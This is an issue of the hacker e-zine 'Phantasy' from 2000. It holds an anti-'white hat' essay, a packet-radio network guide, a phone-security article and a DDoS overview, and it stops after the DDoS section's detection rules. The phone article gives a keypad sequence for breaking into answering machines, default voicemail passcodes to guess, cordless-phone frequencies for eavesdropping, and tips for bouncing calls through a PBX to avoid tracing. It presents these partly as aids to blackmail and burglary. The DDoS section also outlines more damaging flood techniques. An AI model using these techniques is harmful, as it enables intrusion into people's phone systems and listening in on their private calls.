      -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
      =                                                               =
      -            WELCOME TO THE TWENTY-FOURTH ISSUE OF              -
      =                                                               =
      -                        -=>PHANTASY<=-                         -
      =                                                               =
      -               A PUBLICATION AND NEWSLETTER OF                 -
      =                                                               =
      -                             THE                               -
      =                        INTERNATIONAL                          =
      -                         INFORMATION                           -
      =                          RETRIEVAL                            =
      -                            GUILD                              -
      =                                                               =
      -  Hacking, Phreaking, Anarchy, Survivalism, and Commentary     -
      =                                                               =
      -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

      Volume Number Eight - Issue Number Twenty-Four - Dated 03/17/2000
              Editor-In-Chief is Mercenary : iirg@iirg.org
            Staff Writers Are: Thomas Icom : ticom@iirg.org
                                  Black IC : black_ic@iirg.org

 ---------------------
 Table of Discontents:
 ---------------------

 #   Selection                                   Author             
 -  ------------------------------------        ----------------
 1. Legal Ease & IIRG Information               The IIRG
 2. The Myth of the "White Hat Hacker"          Mercenary/IIRG
 3. How To Set Up an Underground 
    Wireless Data Network - Part I              Thomas Icom/IIRG
 4. Basic Phone Security                        Mob Boss
    Making and Breaking It
 5. "Tribe Flood Network 3000"                  Mixter
    A theoretical review
 6. The Nazi Files (Stories of the SS)          The IIRG
 7. IIRG Signal Intelligence                    Black IC/IIRG
    (SIGINT) Guidelines
 8. The Rumor Mill                              Anonymous Sources
 9. FREE the FISH                               Mercenary/IIRG
10. Letters to the IIRG                         N/A
11. IIRG and Phantasy Distribution              The IIRG
12. Articles We Never Want to See               Author Unknown

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [1]: Legal Ease & IIRG Information


    OFFICIAL DISCLAIMER...

    All Contents of PHANTASY Magazine are (C) Copyright by THE IIRG, all 
   rights reserved. Nothing may be reproduced in whole or in part without 
   written permission of the IIRG.
   Phantasy Magazine may also NOT be included on any CD-ROM collection 
   without express written permission of the IIRG. 
    All information published in PHANTASY is from USER contributed material.
   The Publishers and Editors of PHANTASY and THE IIRG disclaim any liability 
   from any damages of any type that the reader or user of such information 
   contained within this newsletter may encounter from the use of said 
   information. All files are brought to you for entertainment purposes only! 
    We also assume all information infringes no copyrights and hereby 
   disclaim any liability.
    In the future PHANTASY Magazine will be made available quarterly to the 
   Internet community free of charge. Any corporate, government, legal, 
   or otherwise commercial usage or possession (electronic or otherwise) is 
   strictly prohibited without written IIRG approval, and is in violation of 
   applicable US Copyright laws.

   The IIRG                                      (IIRG Mailing Address)
   862 Farmington Avenue
   Suite 306
   Bristol, Connecticut 06010

  Here is the IIRG's Public Key:


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
 
 Section [2]: The Myth of the "White Hat Hacker"
              By: Mercenary <iirg@iirg.org>

 The White Hat Hacker does not exist. I propose that this classification
is a myth. This can be proven with a definition, a brief analysis of why 
the term was created, and why this ridiculousness is still flung around 
in the media and hacker communities. 

 First, let's look to see what the term "Hacker" means. 

 The term "hacker" has been misused by the media since the mid 1980's. 
True Hackers are totally different people than what we have been represented 
as. One of our main ethics is to allow no harm to come as a result of our 
actions. For our purposes here, I will refer to "True Hackers" as 
"Classic Hackers".

 Classic Hackers are explorers, individuals whose sole interest is 
learning as much as possible about the electronic systems that fascinate us. 
Some hackers might take excursions into other computer systems, but 
Classic Hackers take the utmost care to disturb nothing. 
 A Classic Hacker's goal is not destruction, nor profit, nor revenge.
Our goal is the pursuit of knowledge and the pursuit of conquest. 
A Classic Hacker believes that information should be free, and that pushing 
the envelope of what is possible should be a daily occurrence. 
We believe that every system is ripe for improvement, whether the 
system is a computer, a program, a set of traffic lights, or a government. 

 The term "White Hat Hacker" is a self-proclaimed title of the Hacker
turned businessman. It is a term created in an attempt to justify 
selling out to the business community.

The most classic example of this is the "L0pht".

 If we look at their FAQ from 1998 we will see that they defined 
themselves as "just a bunch of hackers who got together and started 
working on projects together". They also claimed that "We're not in 
this for the money, or the glory".
 But as is the case with many former hackers, MONEY is the deciding
factor when push comes to shove. As we can see in their latest FAQ
they totally disregard their roots and now claim "We strived to be 
(and achieved) a pure R&D environment. Unfortunately pure research 
and development is not a very profitable arena."
 Of course hacking is not profitable. Nobody ever said it was.
Unless you cross the line and become an actual "criminal", you
can expect to make nothing off your activities.
 I have no problem with Hackers switching to security consulting.
But if you become a security consultant, you are no longer a Hacker.
 By attempting to label yourself as a "White Hat Hacker" you are 
just trying to gain your acceptance to possible customers (victims). 
 Security consultants are businessmen first and foremost, and they 
know their prey well.
 
Can you see the pattern? 

A security consulting firm's job is not to protect your company, 
a security consulting firm's job is to make money selling protection to 
you from demons, real or imagined. 
 In plain words, when they are working for you they are working for 
themselves and this is the case in the entire free market world. 
 The security consultant title is designed to facilitate the deception 
that if you have enough money, someone will take care of your problem 
rather than you learning how to solve your own security issues.

 Now I am sure you have heard by now that the government is waging a 
major propaganda war against the on-line hacker community with the help 
of the socialist media.
 The government and the media are experts on psychology, psychological 
warfare, and brainwashing. Between the two groups they know more about 
the human mind and behavior, and how to control both.
 The anti-hacker movement's main propaganda themes seem to be that 

(1) Hackers are the root of all on-line evil.

(2) That the government, (through more restrictive legislation) 
    is the business community's only hope against the spreading 
    plague of computer crime. 

 To understand the anti-hacker movement, we must understand what 
propaganda is. 
 Simply put, propaganda can be outright lies, distorted facts, and/or 
truth, combined to change a person's thoughts on a subject.
 
 Now it has been known for some time by the Central Intelligence Agency 
that countries such as Russia and China are developing tools to attack 
commercial computer networks.
 Even FBI Director Louis Freeh says that we face a "very serious" espionage 
threat from China. Organized Chinese fraud rings on the mainland and overseas
are hacking databases to compromise credit and identity details.
 "The Chinese gangs have moved into the electronic age where they're using 
hacking techniques and Internet theft," US Secret Service Special Agent 
Gregory Regan explained in testimony before the Senate Judiciary 
Subcommittee on Technology, Terrorism and Government Information.

 Yet with these undeniable allegations by the government's own lackeys,
Janet Reno wants to go after the so called "evil 15 year old hackers",
when it looks like they should have their sights targeted elsewhere.

 What makes this all so much worse is that the "White Hat Hackers" who 
once claimed that "We're not in this for the money, or the glory" are 
testifying before the Senate and strolling up to every TV camera they
can find supposedly speaking for a community they actually have no 
part in anymore.

 The main problem with the media is that they glorify what I like to call
"hacking misfits". The only hackers, crackers, or script kiddies who get
glorified by the media are those who messed-up and got caught.
 The media loves the term "White Hat Hacker", it lets them put across
the propaganda of community cannibalism. 

Hackers turn against their own kind. 

 Let's get the story right folks, these are not hackers, they are paid
Security consultants out to make money selling protection to you for 
something you could easily correct yourself. 
 If you have problems with a "hacker", it's not a Classic Hacker.

        You have a computer criminal on your hands. 

 Hackers do not brag in public IRC channels. Hackers do not testify in
front of Senate committees. If you've been hacked by a "Classic Hacker"
and he's done it right - you'll never even know it.

 So let's get the terminology straight.

 1. Security Consultant - what former hackers become when they sell
                          out their ideals and community.

 2. Computer Criminal   - anyone who uses a computer for monetary gain
                          or illegal activity resulting in damage.

 3. White Hat Hacker    - no such animal or mammal.

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [3]: How To Set Up an Underground Wireless Data Network - Part I
              By: Tom Icom <ticom@iirg.org>

Introduction
============

    Sending data over the airwaves actually predates the Internet. Back in
the 60s, Hams were using a 5-bit code known as Baudot to communicate over
HF amateur bands. The devices used were large electromechanical affairs
known as Teletypes, and ran at speeds of 45 and 75 baud. Baudot is still
used on HF, along with ASCII running at 110 and 300 baud, and other more
modern digital modes such as AMTOR and PSK. Back in the late 80s, Packet
Radio made its appearance running AX.25 (a ham radio version of X.25 used
by packet switched networks) at 300 and 1200 baud. Hams set up a massive
AX.25 digital network stretching on the east coast from Maine to Florida
and inland to the Mississippi River.

    The rise of the Internet, however, caused the decline of packet
radio's popularity. Packet radio requires an amateur radio license, where
the Internet does not. Packet Radio's top speed for the average end user
is generally limited to 9600 baud, with 1200 baud being most common. The
average Internet user comes in at 56K baud over the phone lines, and
faster if they use a cable modem. Packet radio requires more technical
expertise to get up than Internet service.  This is all beyond the means
and intelligence of the average DOS/Exploit/Script "hacker", whose main
concern appears to be acting his sexual frustrations out on random
computer systems.

     Certain "white hat hacker" groups (AKA - Security Consultants)
have been attempting to implement a wireless "underground" network. 
This has been unsuccessful to date because of their insistence of wanting 
a wireless high speed TCP/IP backbone with a ton of superfluous bells and 
whistles as the foundation of their network, legal issues with accessing 
the Internet via the Amateur Bands, short range and high cost of Part 15 
wireless networking devices, and a general lack of serious interest among 
many of the "hackers" they recruit. With many "white hats" now doing 
infosec for corporate interests in a blatant manner, one must begin to 
wonder just how "underground" such a network would be if implemented.

    Other hobbyist organizations have implemented wireless Internet on a
small scale in their locales. While this is all fine and dandy, I don't
consider them underground networks due to the fact that they are operating
in a totally overt manner and are connected to the Internet. Let's face
it. The Internet is great for downloading technical and product support
information, emailing friends and family, expanding one's non-computer
hobbies, and getting the latest news and weather. As the basis for an
underground network it quite frankly sucks, and I fully expect the Feds to
step in and muscle more restrictions on it in the future. It is happening
in the same way it started with our Second Amendment rights,
highly-publicized incidents followed by a call to action by the "experts".

    If you're looking to be able to surf the web, and download megabyte
multimedia files in 30 seconds while at the beach for only $19.95 +
shipping and handling FORGET IT. If you want to be a part of an effective
wireless underground network, then I will show you how, and it will work.
The equipment is inexpensive, and is available off the shelf at any
business that sells amateur radio equipment. The cost of the equipment can
be as little as $200 per station PROVIDED you are willing to expend the
effort to do so. Battery-operated stations are capable of being fitted into
a .50 caliber military surplus ammo can with a solar powered trickle
charger, and placed on a remote hilltop to act as relay stations for
months of unattended operation. While this network does not have
indigenous encryption, it will support the encryption system of your
choice. This, like other aspects of the network, allows you to customize
specifics to suit your needs, thus increasing OPSEC (operational
security). I'm of the belief that telling the world what type of
encryption you're using only gives your enemies one more thing with which
to screw you with. While it may be fine and dandy for the white hat
hackers and academic idiots to allow themselves to play with each other's
crypto, we are simply interested in good COMSEC (Communications Security).
There is plenty of information out there as to what works and what
doesn't. If you decide to use a Caesar cipher on your system you have no
one to blame but yourself.

Equipment
=========

    You will only need the following to get up and running. You will need
a radio.  Most people acquire a 2m/70cm dual-band ham HT that has been
modified for out of band use. These radios typically have a maximum power
output of five watts over a frequency range of 140-174 and 420-470 MHz.
You may also upgrade to a base/mobile unit which offers a power output of
25-50 watts depending on the make and model. You will need a Terminal Node
Controller. This is a 1200 baud AX.25 radio modem that interfaces between
your terminal and your radio. You will need an RS-232 terminal. You can
use anything that has an RS-232 port; PC, Mac, C64, Atari, or even an old
DEC VT-100 terminal if that's what you have. All the work is done via the
TNC. You will need some sort of antenna system. All HTs come with a stock
rubber duck antenna, but you should upgrade to at least a home-built
dipole, 1/4 wave vertical, or j-pole antenna. With a good antenna, even
running 5 watts will give you decent range. You will need a 12 volt power
supply. For a little 5 watt HT you can get by with your basic 3 Amp Radio
Shack supply. A 50 watt mobile will require a larger 20 Amp supply such as
an Astron or similar make.  Hooking all this stuff up is relatively
simple. Specific instructions will be included with the equipment you
purchase, but will be along these lines:


\|/ Antenna     /-----------------------+----------Power Supply
 |              |                       |
 |       +--------------+            /-----\
 |  Coax |              |-Speaker----|     |          Computer Running
 \-Cable-|   Radio      |-Mic Audio--| TNC |-RS-232-- Terminal Program
    Feed |              |-Mic PTT----|     |
         +--------------+            \-----/

    Not too difficult, is it?  THAT is the foundation of the IIRG's
network NEWNet: New England Wireless Network, and that's all you need in
order to get access.  With this simple set-up, you have the capability of
both maintaining a local commo net with your group, and integrating with
larger networks consisting of other groups in your region.

    In future issues of Phantasy, I will be detailing more of the nuts,
bolts, hints and kinks involved in setting up a functional underground
wireless digital communications network. Comments and questions can be
emailed to ticom@iirg.org and there is also a room dedicated to this
purpose up on our telnet BBS PFTE (telnet: luna.iirg.org uid:BBS no p/w).

======================================================================
Thomas Icom, IIRG - <ticom@iirg.org>
International Information Retrieval Guild, "May Odin guide your way!"
<http://www.iirg.org/~ticom/> VMB: 877-570-5970 x570 
======================================================================
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [4]: Basic Phone Security - Making and Breaking It
              By: Mob Boss <mafia_man777@ureach.com>

 The other day I was sitting in class and I was bored out of my head so 
I picked up a dictionary. I was curious to see how a hacker was defined,
considering that seems to be one of the most passionately fought arguments,
good against evil, hackers against crackers. 
 I found the definition to be "A computer enthusiast, someone who breaks
into computers". Not surprising, but when I went to look for "Phreak" and 
"Phone Phreak", lo and behold, it was not there. This seems to be common 
these days. Everyone is shaking in their boots about big, bad, evil hackers
and what might happen to their home or business computer, but no one ever 
stops to think about the phone system. 
 This article is not geared towards anyone specific, in fact this is just 
an abstract to guide all those who are interested in general security, 
privacy, and H/P. Whether you're a small business owner, a homemaker, or an 
executive, there is something here that you should know, if you don't 
already. 
 Phone Phreaking can be loosely defined as the exploration and exploitation 
of the phone system and everything that goes along with it. Back in the 60's
and 70's there was blue boxing, back in the eighties and early nineties there
was red boxing, but nothing compares to the things that are here now, in the 
early part of the 21st century. Seems everything is hooked up to the phone 
system one way or another these days. 
 People are sporting voicemail, pagers, cell phones, home answering machines,
fax machines, computers hooked up to the internet, cell phones hooked up to 
the internet, and there are plans to have cars on the internet pretty soon 
as well, (i.e. 2600 issue 16:4, I OWN YOUR CAR). 

 1984 is here, just a little late. 

 Now considering all that, why would someone ignore learning about the phone 
system considering the whole backbone of telecommunications is the phone 
system? That's a mistake a lot of companies and individuals make. 
 Besides theft of phone service, as there are so many legal ways to make a 
free call these days, but how about privacy? How would you like someone 
monitoring your business via the voicemail system or maybe monitoring your 
house by using the remote access feature on your answering machine to 
actually listen in on what's going on? How about someone tapping your analog 
cell phone or old cordless phone? 
 Now from the attacker's point of view, what better way to watch a target? 
You want to break into a computer network, monitor the voicemail systems for
possible technical information and logins. You want to break into a house, 
listen to messages on the answering machine to find out the patterns of 
those who reside there. Want to blackmail, extort, and steal, well then 
there are tons of possibilities for you. 
 Let's start at home. What communication devices do you own? 
Cordless phone, PC, Fax machine, answering machine? I'm willing to bet you 
have at least one or all of those items in your home. First I will touch on
answering machines, personally I could live without it. Most people hate 
talking on answering machines, and when it's not meant to be it's not meant
to be. But I still own one and the first thing I did when I learned about 
breaking into answering machines was to check my manual to see if my machine
had remote access. As it turned out, it did have remote access but lucky for
me it has a strong security policy, two bad tries will boot you off, plus the
code is a good one. Now machines I have encountered in businesses 
and homes were as easy as dialing 123 after the tone. 
 So what you say? You have nothing to hide? Well privacy is privacy and 
either way I don't want some thug hearing when I'll be at the dentist or 
vacation. This is twice as bad if you're a business and you have customers
leave orders on the phone after hours. 
 Credit card fraud has been booming since the 1980's and two decades later 
it's still a problem, and it's a safe bet that it always will be a problem. 
 Here is an easy to follow system for getting into an answering machine, out
of the many techniques I have read, tried, or heard of this one is the most 
rewarding... 

after the tone start dialing this sequence, 

9876543210000123456789 then 2000, 3000, till you hit 9000, then 
1111, 2222, and so on till you hit 9999. 

 That technique will break into answering machines in the homes of 
government officials, mail order stores, and places that should be more 
secure. Try that on your machine or a friend's (with his permission of 
course) and see how secure that answering machine really is. 
 Another problem that has been around for many years is that of people 
tapping cordless phones with simple frequency scanners. Now this problem
has been dying out but when I flip on the Ol' Bearcat I still hear morons 
yacking away on their old, ten dollar, garage sale, cordless phones. 
 These aren't wholesome conversations either. Drug deals, phone sex, and 
fights. I guess it all depends on where you live but just the same there 
are a lot of possibilities here. Like I said, this is not a new problem, 
but it's still widespread even though a whole decade of cordless terror 
has gone by. 

By programming the following frequencies into your scanner 
you'll hear many conversations:

           Base     Handset      

   1      43.720   48.760
   2      43.740   48.840
   3      43.820   48.860
   4      43.840   48.920
   5      43.920   49.000
   6      43.960   49.080
   7      44.120   49.100
   8      44.160   49.160
   9      44.180   49.200
  10      44.200   49.240
  11      44.320   49.280
  12      44.360   49.360
  13      44.400   49.400
  14      44.460   49.480
  15      44.480   49.500
  16      46.610   49.670
  17      46.630   49.845
  18      46.670   49.860
  19      46.710   49.770
  20      46.730   49.875
  21      46.770   49.830
  22      46.830   49.890
  23      46.870   49.930
  24      46.930   49.990
  25      46.970   49.970

 Obviously you want to listen into the base frequencies so that you hear
 both sides of the conversation. Now you may say well I don't have an old 
phone, "I have a brand new cordless phone that runs on the 900mhz band 
and scrambles the conversation". 
 The only thing I have to say to that is, what if your business partner, 
mistress, and/or accomplice are using an old cordless phone, then your 
security measures mean nothing and it's out there. That's why you have to 
analyze security from afar, missing the big picture will really screw you up. 
 Are you running a dialup server at your residence or small business? 
If you think it's safe because no one but you had the dialup then you my 
friend are dead wrong. For years people have been using programs called 
war dialers (i.e. ToneLoc) to scan exchanges looking for computers and just 
because times have changed and the internet seems to dominate all doesn't 
mean that people have stopped looking to their local exchanges either. 
In fact much can still be found by having a war dialer go for a few hours 
and attackers know this. A company can have a big fancy firewall but a 
dialup sticking out like a sore thumb a few numbers up from their main 
switchboard number. That kind of ignorance can be very, very costly and it 
would be wise to see how your computers are set up. If a dialup server is 
necessary be sure to pick strong passwords and keep up with a good policy 
for protecting that data, physically and remotely. 

	Let's move on to your small (or large) business. 

 Most businesses worth anything at least have a small PBX and voicemail 
system, plus the kind of stuff you may have at home, as all the same 
rules of home security apply at the office as well. It's very important that
a person takes his sweet time with setting up the phone system, baby it just
as much as you would the computer network because leaving the phone system 
open will lead the path to your precious network. 
If someone gets into your phone system what do you have to lose? 
Privacy, valuable information about customers (credit card information), 
use of your lines to call Europe and what not. 
 I must say that PBXs are more challenging now than they were ten years ago 
but considering most voicemail systems run hand in hand with the PBX, 
having weak passcodes on your voicemail system can lead to exploitation of 
your PBX services. Meridian Mail, which is put out by Nortel (www.nortel.com),
for instance has a nice little feature where you can set the operator 
assistance number, which in what I have seen is local numbers, just the same
it can be useful for bouncing through to avoid tracing. I don't think 
anyone wants their phone system used as a jumping off point for attack 
against something big. The same rules of breaking into answering machines 
apply to voicemail, but one can get more creative here. 
 There are usually multiple accounts on a system so if you can't get into one,
move onto another. 999 or 9999 is usually an administrator's box and 100 or 
1000 is usually a general delivery box. It's been my experience that the 
general delivery box can be the most influential as that's where your 
general information can be obtained and that's also a very easy box to get 
into, a lot of the time the passcode is just 1000. In general though some 
passcodes to try are the number of the box as the passcode, 1234, 1111 to 
9999, 1000 to 9000, the name of the person or company in DTMF, and the last 
four digits of the phone number. Knowing that, it's possible to use these 
private phone networks for a lot of different things and I think it's very 
clear why someone should take this into consideration. 
 Ok now that it's clear that your everyday conversations are at risk let's 
talk about some of the ways we can ensure that our distant party is the 
only other person to hear the conversation. Remember the only secure 
conversation is one in person, free of any monitoring. Getting back to the 
point, one must consider what level of security is needed for a conversation 
before they begin to put security measures in place. For instance I doubt 
you need to encrypt a voice conversation with your grandmother (unless she 
works for a three letter agency) nor do I think you want to be on that old 
cordless phone while buying arms from third world terrorists (not that I'm 
advocating that). Let's say you are interested in securing voice 
communication, here are some ideas on what you can do to protect your 
privacy. The first method is accomplished through PGPphone, a nice little 
program from the makers of PGP (Pretty Good Privacy). This program allows 
for secure modem to modem or tcp/ip based voice communication. Using PGP keys
at the strength preselected the conversation can be encrypted and secured 
from prying ears. Only drawback is that there is a little bit of lag and the 
stronger the key, the more static and breakup you will get. Another idea for 
shaking any taps on your phone line or your counterpart's phone line is 
through the use of a number of payphones. If you keep a good list of payphone 
numbers in your area that allow for incoming calls you can be at a certain 
payphone at a preselected time to receive that call. If it's busy you can 
always have a backup payphone not too far away or your contact will simply 
try back every two minutes. In my area at least there are still some 
neighborhood COCOTs (customer owned coin operated telephone) that still take 
in calls. Your best bet is to call a voicemail number that has ANI every 
time you're at a payphone. When you get home call all the payphone numbers you 
accumulated and see which ones take in calls. Some owned by the Telco will 
not allow the call to go through, some COCOTs will have a modem pick up. 
As another approach you could always invest in one of those expensive 
communication devices that hook up to the telephone and allow you to call 
another telephone with the device. The price is definitely a drawback 
($500 area) so using one of the less expensive methods is most likely the 
best way to go. Be creative and use your common sense, doing that 
you'll come up with many creative ideas. 

	This was meant simply as a primer to phone security. Yes these are old 
problems but they needed to be retouched on because it seems many people are 
still mystified by simple phone phreaking techniques. There are other phone
risks, such as beige boxing and social engineering, but those topics have 
been covered already in some very well detailed articles that are available
on sites all over the internet and fine BBSs like Ripco. I hope this has 
opened your eyes to the dangers out there or at least refreshed your memory.
 And to cut off all those flames that I ripped this information off and what 
not, I have spent many hours on the phone testing and perfecting these 
techniques, there is nothing here that I don't have first hand knowledge of.
 I'd like to leave off with these words that a good friend recently told me, 
"When you take from one it's plagiarism, but when you take from many it's 
research.".

Appendix

PGPphone                        http://web.mit.edu/network/pgpfone/

Phreaking Info                  http://come.to/mobdomain
                                http://www.phonelosers.org
                                http://www.hackersclub.com/km


-The Mob Boss; http://come.to/mobdomain
 Voicemail and fax: 1-877-203-3043

 Special Thanks To...

Deo
Ryan 
Websulker (http://www.websulker.com)

and anyone else I left out... 

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

 Section [5]: "Tribe Flood Network 3000": A theoretical review
              By: Mixter <mixter@newyorkoffice.com>

-----BEGIN PGP SIGNED MESSAGE-----


		"Tribe Flood Network 3000": A theoretical review
	of what exactly Distributed DOS tools are, how they can be used,
   what more dangerous features can be implemented in the future, and starting
       points on establishing Network Intrusion Detection Rules for DDOS.	


Many technically uninformed people consider DDOS as a weapon, that should not
be publicly evolved and distributed. This is the only further thing I'll be
releasing to explain DDOS tools, comprehensible for EVERYONE, and future
features that may be implemented in DDOS: a brief theoretical description.
BTW: People with technical knowledge may skip over most of the stuff in I. and II.


I. What is distributed DOS, what can it be used for, how does it operate?
II. What are DDOS features, what are future DDOS features, how is DDOS evolving?
III. DDOS, an exploit or not? Should it be published? What is the main problem?
IV. How can DDOS traffic be detected by Network Intrusion Detection (NIDS)?


I.
What is distributed DOS?
Distributed DOS, like any distributed concept, will make it easy to coordinate
a procedure that is launched from many computers. In this case it is Denial
Of Service in form of packet flooding, to overload network links.
DDOS IS NOT A HACKING TOOL CATEGORY. Distributed DOS tools are PENETRATION
tools. They do not exploit security vulnerabilities, but they can demonstrate
what amount of traffic a host can or cannot handle. Distributed DOS has been
used a long time by professional security consultants for penetration testing.
Before there were DDOS attack tools, there have been commercial, non-open-source
programs out that could launch distributed packet floods. Those were used in the
information security consulting business, to perform a security service called
"Capacity Management". The purpose of Capacity Management is to determine how
much traffic a network can handle, to see if the target's bandwidth has to be
improved, or if it can handle enough traffic while providing service reliably.

What can it be used for?
It can overload, or flood if you want, network links. It sends meaningless
packets, the overall amount of data being more than the network can process.
The impact is that the targets can not be reached over a network. That is all.

How does it operate?
The basic concept is that you install a huge amount of DOS servers on different
hosts. They will await commands from a central client. A central client can then
message all the servers, and instruct them to send as much traffic as they can
to one target. The tool distributes the work of flooding a target amongst all
available DOS servers, therefore it is called a distributed concept.
Before these tools were available, an attacker (or penetration tester) would
have to telnet into all the hosts that he wanted to use, log in as a user,
and manually launch a command to flood a target on each of the hosts that
should flood, for example using the UNIX standard tool ping: 'ping -f target'


II.
What are DDOS features?
The actual attack tools don't do simple flooding, but variations of it which
involve using actual weaknesses in a protocol to a) make an attack more
powerful b) make an attack harder to track back. First, current DDOS tools
spoof source addresses. They are sending raw IP packets, and due to the
nature of the internet protocol the source addresses can be fake ones, and
single (not connection oriented) packets will still reach their destination.
This is basically what makes backtracking of the attacks so hard. DDOS is
also exploiting protocol weaknesses, it for example can open up half-open
TCP connections by SYN flooding. This is a very old and well known protocol
vulnerability, and feasible countermeasures are present. To make attacks more
powerful, DDOS can generally use any protocol vulnerability that can be
exploited by sending single, not connection oriented packet traffic to a host.

What are future DDOS features?
Things that can still be implemented, but have not in publicized tools,
are protocol vulnerabilities as mentioned above. One of those is the "stream"
attack (discovered by Tim Yardley, stream.c and spank.c demonstrate the
vulnerability and are public). Stream attack sends TCP packets with either
ACK or both SYN and ACK flags set. Because they are not part of a connection,
they will "confuse" a target machine and take some time to be processed by
the operating system. If this attack is used in a distributed way, the attacker
can overload machines with fewer hosts. From what I've heard, distributed stream
attack IS already implemented in private DDOS tools. It is very trivial to
implement this feature. A second possibility that is not implemented yet is
multicast addresses. Multicast addresses are routed (forwarded) specially by
routers, they can multiply one packet into several ones. The concept would be
to send out packets with a multicast (224.x.x.x) source. A target could send
an error message back to multicast destinations, and multiply the bandwidth.
This concept has also been mentioned by Tim Yardley. Another concept could
be to purposefully send special strings in the flood traffic, strings that
Intrusion Detection Systems (IDS) could falsely interpret as break-in attempts,
the impact would be false alarms and affected IDS could get overloaded or crash.

How is DDOS evolving?
As I mentioned, the first tools that did distributed denial of service were
commercial penetration tools. The origin of using general DOS is certainly
IRC (Internet Relay Chat), where kiddies can take over control of channels if
they temporarily take out computer systems with DOS. The first packet flooding
DOS that involved multiple servers flooding was "smurf". Smurfing relied on
mis-configured networks replying back to a broadcast address, sending one
packet would result in hundreds bouncing back. Then, most of those networks
were fixed, and attackers compromised a lot of hosts, preferably hosts with
high bandwidth, and started flooding manually from them. Because this took
a lot of time, attackers wrote servers which they installed on the hosts
they had compromised. They no longer needed to log in, but only message those
servers. The DDOS attack tools I know of are, in chronological release order:
fapi (private, by ?), blitznet (public, by phreeon), trinoo (private, by 
phifli), TFN (public, by me), stacheldraht (private, by randomizer), shaft
(private, by ?), TFN2K (public, by me), Trank (TRinoo + spANK.c?, private).
The recent development has also continued in other ways, since people were
monitoring traffic for very DDOS-program-specific traffic (like known character
strings, known passwords, default ports), there have been many small variations
made to the code of the above tools, by attackers, to prevent being detected.


III.
DDOS, an exploit or not?
No. DDOS itself is not an exploit. It just makes an existing concept
easier. Take the distributed.net RC5 challenge and distributed password crackers.
They are not exploits. But they are exposing a weakness, that many passwords
can be brute forced faster than people think. DDOS shows that many networks
are not as strong as they seem to be and can be overloaded faster than people
used to think. Additionally, there are actual exploits implemented in DDOS
tools, that exploit security holes in network protocols currently used
on the Internet. These security holes need not necessarily be exploited to
make DDOS possible, but they do make the impact of DDOS attacks more powerful.
Such exploits are the possibility of arbitrarily spoofing IP addresses, SYN
flooding, IP stack attacks with bad fragmentation, header offsets and other
"magic packets", the stream vulnerability, and missing authentication and
security of traffic known as connection-less or stateless.

Should it be published?
That is for you to decide. It is your personal opinion. But people will
continue to publish vulnerabilities. Hundreds of talented security analysts
are professionally researching vulnerabilities in software, and posting
exploit programs, which can often be used to instantly compromise a system
running the vulnerable software at root level. The past has shown, that since
security vulnerabilities were a problem on the internet, people have been
ignoring advisories containing only the information THAT something was
vulnerable to an attack, disregarding them as being "completely theoretic".
Only when people wrote up and posted ready-to-(ab)use vulnerability
exploits, the severity of vulnerabilities became clear, and people would
make an effort to counter those vulnerabilities.

What is the main problem?
The main problem, that made attacks against sites as big as yahoo.com
possible, is the bad overall security on the internet. With ONLY a DDOS
tool in his hands, Joe Attacker cannot do anything. But security vulnerabilities
are omni-present on the majority of hosts on the net. An awful lot of these
hosts are not caring about their security, as a result they are running
software that is KNOWN to be vulnerable, and against which public exploit
programs exist. An attacker has only to run one of the public exploit programs
and he is granted full access to such hosts. And various people have been
able to compromise THOUSANDS of hosts with well-known, old vulnerabilities.
Even high speed university networks, which originally built the foundation
of internet architecture have proven to be insecure. With full control over
thousands of hosts, it is easy to concentrate all of these hosts' resources,
and to be able to attack almost anything on the internet.


IV.
How can DDOS traffic be detected by Network Intrusion Detection (NIDS)?

The mistake everyone has been making is to search for default strings of
special DDOS tools, for default values, ports, passwords, etc.
To establish Network Intrusion Detection capability in order to spot these
tools, that operate via connectionless raw packets, people will have to start
looking for general signs of DDOS traffic, signs that are obvious and
traffic that is extensively anomalous and suspicious.
There are two kinds of DDOS-generated traffic, control traffic (between DDOS
client and servers) and flood traffic (between DDOS servers and DDOS victim).
Credits to rain forest puppy, Dave Dittrich, and Axent Security Team
for providing some initial hints I needed to write this up.

Anomaly 0: This is not real "DDOS" traffic, but it can be a viable method
of determining the origin of DDOS attacks. As observed by RFP, an attacker
will have to resolve his victim's hostname before a DDOS attack. BIND name
servers are capable of recording these requests. You can either send them
a WINCH signal with 'kill', or you can specify query logging in the BIND
configuration. A single PTR type query before an attack indicates the request
was made from the attacker's host, a great load of PTR type queries for a
DDOS victim before an attack indicates that the flood servers have been
fed a host name and each server was resolving the hostname for itself.

Anomaly 1: Amount of bandwidth exceeds a maximum threshold that
expected normal traffic for a site could cause. Alternatively, the
threshold can be measured in the amount of different source addresses
in the traffic. These are clear signs of flood traffic and ACL rules can be
implemented on the backbone routers that detect these signs and filter traffic.

Anomaly 2: Oversized ICMP and UDP packets. Stateful UDP sessions are
normally using small UDP packets, having a payload of not more than 10
bytes. Normal ICMP messages don't exceed 64 to 128 bytes. Packets that
are reasonably bigger are suspicious of containing control traffic, mostly
the encrypted target(s) and other options for the DDOS server. Once
(non-decoy) control traffic is spotted, one of the DDOS servers' location
is revealed, as the destination IP address is not spoofed in control traffic.

Anomaly 3: TCP packets (and UDP packets) that are not part of a connection.
The stealthiest DDOS tools use random protocols, including connection-oriented
protocols, to send data over non-connection-oriented channels. Using stateful
firewalls or link-state routing can discover these packets. Additionally,
packets that indicate connection requests with destination ports above 1024,
with which no known service is registered and running, are highly suspicious.

Anomaly 4: Packet payload contains ONLY alphanumeric characters (e.g. no
spaces, punctuation, control characters). This can be a sign that the packet
payload is BASE64-encoded, and therefore contains only base64 characters.
